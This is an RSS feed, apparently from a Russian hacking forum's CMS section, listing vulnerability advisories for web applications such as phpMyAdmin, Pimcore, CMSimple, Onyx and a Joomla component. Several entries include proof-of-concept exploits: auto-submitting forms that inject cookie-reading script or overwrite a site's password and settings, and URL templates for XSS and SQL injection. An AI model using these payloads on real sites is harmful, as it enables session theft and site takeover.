<?xml version="1.0" encoding="windows-1251"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Форум The Mafia - CMF/CMS</title>
		<link>http://forum.xeka.ru/</link>
		<description />
		<language>ru</language>
		<lastBuildDate>Sun, 05 Sep 2010 17:53:28 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://forum.xeka.ru/air/misc/rss.jpg</url>
			<title>Форум The Mafia - CMF/CMS</title>
			<link>http://forum.xeka.ru/</link>
		</image>
		<item>
			<title>PHP-инклюдинг в Open-Realty</title>
			<link>http://forum.xeka.ru/f58/t30244/</link>
			<pubDate>Tue, 24 Aug 2010 13:36:02 GMT</pubDate>
			<description>*Программа:* Open-Realty 2.x 
 
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.  
Уязвимость...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Open-Realty 2.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. <br />
Уязвимость существует из-за недостаточной обработки входных данных в POST параметре &quot;select_users_lang&quot; сценарием index.php. <br />
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30244/</guid>
		</item>
		<item>
			<title>Обход ограничений безопасности в phpMyAdmin</title>
			<link>http://forum.xeka.ru/f58/t30241/</link>
			<pubDate>Tue, 24 Aug 2010 13:27:21 GMT</pubDate>
			<description>*Программа:* phpMyAdmin 2.x 
 
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе.  
Уязвимость...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> phpMyAdmin 2.x<br />
<br />
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. <br />
Уязвимость существует из-за ошибки в обработке POST запросов при проверке параметров конфигурации во время процедуры настройки setup.<br />
Эксплуатирование уязвимости позволит вставить произвольный PHP код в конфигурационный файл phpMyAdmin.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30241/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Apache CouchDB</title>
			<link>http://forum.xeka.ru/f58/t30094/</link>
			<pubDate>Fri, 20 Aug 2010 10:24:28 GMT</pubDate>
			<description>*Программа:* Apache CouchDB 0.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Apache CouchDB 0.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. <br />
Атакующий может выполнить произвольный Javascript сценарий в контексте безопасности интерфейса администрирования (Futon).</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30094/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Pimcore</title>
			<link>http://forum.xeka.ru/f58/t30014/</link>
			<pubDate>Wed, 18 Aug 2010 13:57:34 GMT</pubDate>
			<description>*Программа:* Pimcore 1.X 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует из-за...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Pimcore 1.X<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;form action=&quot;http://host/admin/page/save/task/publish&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;<br />
<br />
<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;data&quot; value='{&quot;headernote&quot;: {&quot;data&quot;: &quot;Powerful CMS&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&quot;, <br />
&quot;type&quot;: &quot;textarea&quot;}, &quot;headline&quot;: {&quot;data&quot;: &quot;The truth about pimcore&quot;, &quot;type&quot;: &quot;input&quot;}, <br />
&quot;contentblock&quot;: {&quot;data&quot;: [&quot;1&quot;], &quot;type&quot;: &quot;block&quot;}, &quot;blocktypecontentblock1&quot;: {&quot;data&quot;: <br />
null, &quot;type&quot;: &quot;select&quot;}, &quot;sublinecontentblock1&quot;: {&quot;data&quot;: &quot;Content management <br />
ala pimcore&quot;, &quot;type&quot;: &quot;input&quot;}, &quot;contentcontentblock1&quot;: {&quot;data&quot;: &quot;&lt;p&gt;\n\tPimcore&lt;/p&gt;\n\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&quot;, <br />
&quot;type&quot;: &quot;wysiwyg&quot;}}' /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;1440&quot; /&gt;<br />
<br />
<br />
<br />
&lt;/form&gt;<br />
<br />
&lt;script&gt;<br />
<br />
document.main.submit();<br />
<br />
&lt;/script&gt;</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30014/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в CMSimple</title>
			<link>http://forum.xeka.ru/f58/t30013/</link>
			<pubDate>Wed, 18 Aug 2010 13:54:45 GMT</pubDate>
			<description>*Программа:* CMSimple 3.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует из-за...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> CMSimple 3.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;form action=&quot;http://host/&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;<br />
<br />
<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;security_password&quot; value=&quot;newpassword&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;security_type&quot; value=&quot;page&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;site_title&quot; value='CMSimple site' /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;site_template&quot; value=&quot;default&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;language_default&quot; value=&quot;ru&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;meta_keywords&quot; value=&quot;CMSimple, Content Management <br />
System, php&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;meta_description&quot; value=&quot;CMSimple is a content <br />
management system&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;backup_numberoffiles&quot; value=&quot;5&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;images_maxsize&quot; value=&quot;150000&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;downloads_maxsize&quot; value=&quot;1000000&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;mailform_email=&quot; value=&quot;&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;editor_height&quot; value=&quot;(screen.availHeight)-400&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;editor_external&quot; value=&quot;&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_color&quot; value=&quot;000000&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_highlightcolor&quot; value=&quot;808080&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_levels&quot; value=&quot;3&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_levelcatch&quot; value=&quot;10&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_sdoc&quot; value=&quot;&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;menu_legal&quot; value=&quot;CMSimple Legal Notices&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;uri_seperator&quot; value=&quot;:&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;uri_length&quot; value=&quot;200&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;xhtml_endtags&quot; value=&quot;&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;xhtml_amp&quot; value=&quot;true&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;plugins_folder&quot; value=&quot;&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;functions_file&quot; value=&quot;functions.php&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;scripting_regexp&quot; value=&quot;\#CMSimple (.*?)\#&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;form&quot; value=&quot;array&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;file&quot; value=&quot;config&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;save&quot; /&gt;<br />
<br />
<br />
<br />
&lt;/form&gt;<br />
<br />
&lt;script&gt;<br />
<br />
document.main.submit();<br />
<br />
&lt;/script&gt;</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30013/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Edit-X CMS</title>
			<link>http://forum.xeka.ru/f58/t30012/</link>
			<pubDate>Wed, 18 Aug 2010 13:49:24 GMT</pubDate>
			<description>*Программа:* Edit-X CMS 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует из-за...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Edit-X CMS<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных в параметре &quot;search_text&quot; сценарием index.php.<br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">http://host/index.php?w=5&amp;search_text=[XSS]</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t30012/</guid>
		</item>
		<item>
			<title>SQL-инъекция в Joomla onGallery Component</title>
			<link>http://forum.xeka.ru/f58/t29971/</link>
			<pubDate>Tue, 17 Aug 2010 13:20:10 GMT</pubDate>
			<description>*Программа:* onGallery 2.x (component for Joomla) 
 
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> onGallery 2.x (component for Joomla)<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. <br />
Уязвимость существует из-за недостаточной обработки входных данных в параметре &quot;id&quot; сценарием index.php (когда &quot;option&quot; установлен в &quot;com_ongallery&quot; и &quot;task&quot; установлен в &quot;ft&quot;) . <br />
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">http://site/path/index.php?option=com_ongallery&amp;task=ft&amp;id=-1[SQLi]</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29971/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Ruby</title>
			<link>http://forum.xeka.ru/f58/t29970/</link>
			<pubDate>Tue, 17 Aug 2010 13:18:20 GMT</pubDate>
			<description>*Программа: * 
Ruby 1.8.x 
Ruby 1.9.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость...</description>
			<content:encoded><![CDATA[<div><b>Программа: </b><br />
Ruby 1.8.x<br />
Ruby 1.9.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных в Ruby WEBrick HTTP сервере. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29970/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Zomplog</title>
			<link>http://forum.xeka.ru/f58/t29969/</link>
			<pubDate>Tue, 17 Aug 2010 13:17:25 GMT</pubDate>
			<description>*Программа:* Zomplog 3.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует из-за...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Zomplog 3.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных в параметре &quot;message&quot; различными сценариями. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">http://[host]/admin/users.php?message=[XSS]<br />
http://[host]/admin/category.php?message=[XSS]<br />
http://[host]/admin/entry.php?message=[XSS]<br />
http://[host]/admin/newentry.php?message=[XSS]<br />
http://[host]/admin/comments.php?message=[XSS]<br />
http://[host]/admin/newpage.php?message=[XSS]<br />
http://[host]/admin/page.php?message=[XSS]<br />
http://[host]/admin/settings.php?message=[XSS]<br />
http://[host]/admin/changeclothes.php?message=[XSS]<br />
http://[host]/admin/settings_theme.php?message=[XSS]<br />
http://[host]/admin/themes.php?message=[XSS]<br />
http://[host]/admin/plugins.php?message=[XSS]</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29969/</guid>
		</item>
		<item>
			<title>Обход ограничений безопасности в Blue Coat Security Gateway OS (SGOS)</title>
			<link>http://forum.xeka.ru/f58/t29968/</link>
			<pubDate>Tue, 17 Aug 2010 13:11:28 GMT</pubDate>
			<description>*Программа:*  
Blue Coat Security Gateway OS (SGOS) 4.x 
Blue Coat Security Gateway OS (SGOS) 5.x 
 
Уязвимость позволяет удаленному злоумышленнику...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> <br />
Blue Coat Security Gateway OS (SGOS) 4.x<br />
Blue Coat Security Gateway OS (SGOS) 5.x<br />
<br />
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. <br />
Уязвимость существует из-за ошибки в применении политик относящихся к привилегиям. <br />
Локальный администратор с правами только на чтение может передать HTTPS URL устройству, содержащий CLI команды, что позволит получить полные права администратора.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29968/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Blue Coat Security Gateway OS</title>
			<link>http://forum.xeka.ru/f58/t29967/</link>
			<pubDate>Tue, 17 Aug 2010 13:09:20 GMT</pubDate>
			<description>*Программа:*  
Blue Coat Security Gateway OS (SGOS) 4.x 
Blue Coat Security Gateway OS (SGOS) 5.x 
 
Уязвимость позволяет удаленному пользователю...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> <br />
Blue Coat Security Gateway OS (SGOS) 4.x<br />
Blue Coat Security Gateway OS (SGOS) 5.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных, передаваемых через URL страницей ICAP Patience Page. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29967/</guid>
		</item>
		<item>
			<title>Обход ограничений безопасности в Apache CXF</title>
			<link>http://forum.xeka.ru/f58/t29966/</link>
			<pubDate>Tue, 17 Aug 2010 13:07:06 GMT</pubDate>
			<description>*Программа:* Apache CXF 2.x 
 
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе.  
Уязвимость...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Apache CXF 2.x<br />
<br />
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. <br />
Уязвимость существует из-за ошибки в CXF при разграничении доступа к обработке XML Document Type Declarations (DTD). <br />
Эксплуатирование уязвимости позволит определелить существование файлов, включить содержимое локальных и потенциально внешних файлов в качестве DTD ссылки или выполнить DoS атаку путем отправки сильно вложенного DTD файла.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29966/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в Onyx</title>
			<link>http://forum.xeka.ru/f58/t29912/</link>
			<pubDate>Mon, 16 Aug 2010 12:11:55 GMT</pubDate>
			<description>*Программа:* Onyx 0.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость существует из-за...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> Onyx 0.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных сценарием admin/settings/update. <br />
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.<br />
<br />
<b>Эксплоит:</b><br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Код:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">&lt;form action=&quot;http://host/admin/settings/update&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[site_title]&quot; value=&quot;My Onyx Gallery&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[site_keywords]&quot; value='Ruby on Rails Gallery&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;' /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[site_description]&quot; value='Onyx is an open <br />
source free ruby on rails gallery&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;' /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[welcome_title]&quot; value=&quot;Welcome!&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[welcome_message]&quot; value=&quot;Welcome to my <br />
gallery!&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[uniform_width]&quot; value=&quot;500&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[uniform_height]&quot; value=&quot;500&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[thumbnail_width]&quot; value=&quot;100&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[thumbnail_height]&quot; value=&quot;100&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[dummy_watermark_enabled]&quot; value=&quot;0&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[tooltips_enabled]&quot; value=&quot;1&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[tooltip_width]&quot; value=&quot;300&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;setting[maximum_uploadable_files]&quot; value=&quot;10&quot; /&gt;<br />
<br />
&lt;input type=&quot;hidden&quot; name=&quot;commit&quot; value=&quot;Update Settings&quot; /&gt;<br />
<br />
<br />
&lt;/form&gt;<br />
<br />
&lt;script&gt;<br />
<br />
document.main.submit();<br />
<br />
&lt;/script&gt;</code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29912/</guid>
		</item>
		<item>
			<title>Обход ограничений безопасности в KnowledgeTree Open Source</title>
			<link>http://forum.xeka.ru/f58/t29911/</link>
			<pubDate>Mon, 16 Aug 2010 12:09:34 GMT</pubDate>
			<description>*Программа:* KnowledgeTree Open Source 3.x 
 
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. ...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> KnowledgeTree Open Source 3.x<br />
<br />
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. <br />
Уязвимость существует из-за ошибки в проверке входных данных сценарием search2/ajax/metadata.php. <br />
Эксплуатирование уязвимости приведет к обходу ограничений безопасности и позволит получить доступ к запрещенной информации относящейся к типам документов наборам полей и полям.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29911/</guid>
		</item>
		<item>
			<title>Межсайтовый скриптинг в KnowledgeTree Open Source</title>
			<link>http://forum.xeka.ru/f58/t29905/</link>
			<pubDate>Mon, 16 Aug 2010 11:19:40 GMT</pubDate>
			<description>*Программа:* KnowledgeTree Open Source 3.x 
 
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.  
Уязвимость...</description>
			<content:encoded><![CDATA[<div><b>Программа:</b> KnowledgeTree Open Source 3.x<br />
<br />
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. <br />
Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. <br />
Атакующий может обманным образом заманить пользователя на специально составленный сайт, что позволит изменить пароль администратора или повысить привилегии пользователя до уровня администратора.</div>

]]></content:encoded>
			<category domain="http://forum.xeka.ru/f58/">CMF/CMS</category>
			<dc:creator>%R00tKit%</dc:creator>
			<guid isPermaLink="true">http://forum.xeka.ru/f58/t29905/</guid>
		</item>
	</channel>
</rss>
